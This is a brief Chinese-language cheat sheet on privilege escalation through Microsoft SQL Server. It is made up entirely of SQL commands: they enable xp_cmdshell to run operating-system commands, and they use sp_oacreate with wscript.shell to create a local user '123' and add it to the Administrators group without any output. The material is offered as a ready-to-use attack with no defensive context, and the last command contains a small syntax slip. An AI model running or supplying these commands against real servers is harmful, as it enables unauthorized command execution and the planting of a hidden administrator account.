sqlserver提权

开启xp_cmdshell

 

exec sp_configure 'show advanced options', 1;reconfigure; exec sp_configure 'xp_cmdshell',1;reconfigure;

 

执行命令

 

EXEC master.dbo.xp_cmdshell 'ipconfig'

 

关闭xp_cmdshell

exec sp_configure 'show advanced options', 1;reconfigure; exec sp_configure 'xp_cmdshell', 0;reconfigure

 

存储过程（无回显）

添加账号

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 123 123 /add'

 

添加到管理员组

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 123/add'